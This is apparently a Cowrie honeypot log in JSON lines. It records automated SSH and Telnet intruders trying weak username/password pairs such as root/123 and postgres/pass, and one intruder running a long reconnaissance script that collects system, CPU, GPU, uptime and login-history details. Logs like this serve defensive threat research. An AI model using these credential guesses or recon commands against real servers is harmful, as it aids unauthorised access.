{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49306,"dst_ip":"1.2.3.4","dst_port":22,"session":"82f6f7306339","protocol":"ssh","message":"New connection: 212.227.125.160:49306 (1.2.3.4:22) [session: 82f6f7306339]","sensor":"my-vps","timestamp":"2025-08-31T05:40:13.871099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:40:14.410829Z","src_ip":"212.227.125.160","session":"82f6f7306339"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"2.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:40:14.421333Z","src_ip":"212.227.125.160","session":"917a93a02abb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:40:14.451303Z","src_ip":"212.227.125.160","session":"82f6f7306339"}
{"eventid":"cowrie.session.closed","duration":"21.0","message":"Connection lost after 21.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:40:14.461168Z","src_ip":"212.227.125.160","session":"917a93a02abb"}
{"eventid":"cowrie.login.failed","username":"test1","password":"letmein","message":"login attempt [test1/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T05:40:16.741829Z","src_ip":"212.227.125.160","session":"82f6f7306339"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:40:18.075386Z","src_ip":"212.227.125.160","session":"82f6f7306339"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:40:24.624052Z","src_ip":"212.227.235.229","session":"1cca7bc7a908"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47298,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ee2139f06bd","protocol":"ssh","message":"New connection: 212.227.125.160:47298 (1.2.3.4:22) [session: 5ee2139f06bd]","sensor":"my-vps","timestamp":"2025-08-31T05:40:24.885807Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:40:38.852386Z","src_ip":"212.227.125.160","session":"5ee2139f06bd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:40:38.854763Z","src_ip":"212.227.125.160","session":"5ee2139f06bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56416,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ac6ece1c5a4","protocol":"ssh","message":"New connection: 212.227.235.229:56416 (1.2.3.4:22) [session: 2ac6ece1c5a4]","sensor":"my-vps","timestamp":"2025-08-31T05:40:47.442985Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38074,"dst_ip":"1.2.3.4","dst_port":22,"session":"df5d56496250","protocol":"ssh","message":"New connection: 212.227.235.229:38074 (1.2.3.4:22) [session: df5d56496250]","sensor":"my-vps","timestamp":"2025-08-31T05:40:50.843756Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:40:51.544062Z","src_ip":"212.227.235.229","session":"df5d56496250"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:40:51.544989Z","src_ip":"212.227.235.229","session":"df5d56496250"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:40:55.428990Z","src_ip":"212.227.235.229","session":"1cca7bc7a908"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T05:40:55.429741Z","src_ip":"212.227.235.229","session":"1cca7bc7a908"}
{"eventid":"cowrie.login.failed","username":"test1","password":"welcome","message":"login attempt [test1/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T05:40:57.597960Z","src_ip":"212.227.235.229","session":"df5d56496250"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:40:59.312422Z","src_ip":"212.227.235.229","session":"df5d56496250"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":57056,"dst_ip":"1.2.3.4","dst_port":22,"session":"61075e78328d","protocol":"ssh","message":"New connection: 43.159.36.188:57056 (1.2.3.4:22) [session: 61075e78328d]","sensor":"my-vps","timestamp":"2025-08-31T05:41:00.309749Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:41:00.310380Z","src_ip":"43.159.36.188","session":"61075e78328d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:41:00.562950Z","src_ip":"43.159.36.188","session":"61075e78328d"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"pass","message":"login attempt [postgres/pass] failed","sensor":"my-vps","timestamp":"2025-08-31T05:41:01.616585Z","src_ip":"43.159.36.188","session":"61075e78328d"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:41:02.871583Z","src_ip":"43.159.36.188","session":"61075e78328d"}
{"eventid":"cowrie.session.closed","duration":"20.4","message":"Connection lost after 20.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:41:07.816170Z","src_ip":"212.227.235.229","session":"2ac6ece1c5a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33583,"dst_ip":"1.2.3.4","dst_port":23,"session":"b9a2e0136ea4","protocol":"telnet","message":"New connection: 212.227.125.160:33583 (1.2.3.4:23) [session: b9a2e0136ea4]","sensor":"my-vps","timestamp":"2025-08-31T05:41:09.547019Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60136,"dst_ip":"1.2.3.4","dst_port":22,"session":"73f28641c252","protocol":"ssh","message":"New connection: 212.227.125.160:60136 (1.2.3.4:22) [session: 73f28641c252]","sensor":"my-vps","timestamp":"2025-08-31T05:41:10.163087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:41:10.164050Z","src_ip":"212.227.125.160","session":"73f28641c252"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:41:10.323650Z","src_ip":"212.227.125.160","session":"73f28641c252"}
{"eventid":"cowrie.login.success","username":"root","password":"12","message":"login attempt [root/12] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:41:10.803196Z","src_ip":"212.227.125.160","session":"73f28641c252"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:41:11.545409Z","src_ip":"212.227.125.160","session":"73f28641c252"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T05:41:11.546273Z","src_ip":"212.227.125.160","session":"73f28641c252"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T05:41:11.547161Z","src_ip":"212.227.125.160","session":"73f28641c252"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T05:41:11.548733Z","src_ip":"212.227.125.160","session":"73f28641c252"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T05:41:11.550279Z","src_ip":"212.227.125.160","session":"73f28641c252"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T05:41:11.551164Z","src_ip":"212.227.125.160","session":"73f28641c252"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T05:41:11.552225Z","src_ip":"212.227.125.160","session":"73f28641c252"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T05:41:11.553397Z","src_ip":"212.227.125.160","session":"73f28641c252"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T05:41:11.554241Z","src_ip":"212.227.125.160","session":"73f28641c252"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T05:41:11.554701Z","src_ip":"212.227.125.160","session":"73f28641c252"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T05:41:11.555213Z","src_ip":"212.227.125.160","session":"73f28641c252"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T05:41:11.555831Z","src_ip":"212.227.125.160","session":"73f28641c252"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T05:41:11.556469Z","src_ip":"212.227.125.160","session":"73f28641c252"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T05:41:11.717597Z","src_ip":"212.227.125.160","session":"73f28641c252"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:41:11.718718Z","src_ip":"212.227.125.160","session":"73f28641c252"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:41:11.719779Z","src_ip":"212.227.125.160","session":"73f28641c252"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":50490,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa6949951985","protocol":"ssh","message":"New connection: 170.64.166.123:50490 (1.2.3.4:22) [session: fa6949951985]","sensor":"my-vps","timestamp":"2025-08-31T05:41:11.960483Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:41:11.961325Z","src_ip":"170.64.166.123","session":"fa6949951985"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56478,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e1539c5d9a1","protocol":"ssh","message":"New connection: 212.227.125.160:56478 (1.2.3.4:22) [session: 0e1539c5d9a1]","sensor":"my-vps","timestamp":"2025-08-31T05:41:12.001617Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:41:12.242684Z","src_ip":"170.64.166.123","session":"fa6949951985"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:41:12.354269Z","src_ip":"212.227.125.160","session":"0e1539c5d9a1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:41:12.355015Z","src_ip":"212.227.125.160","session":"0e1539c5d9a1"}
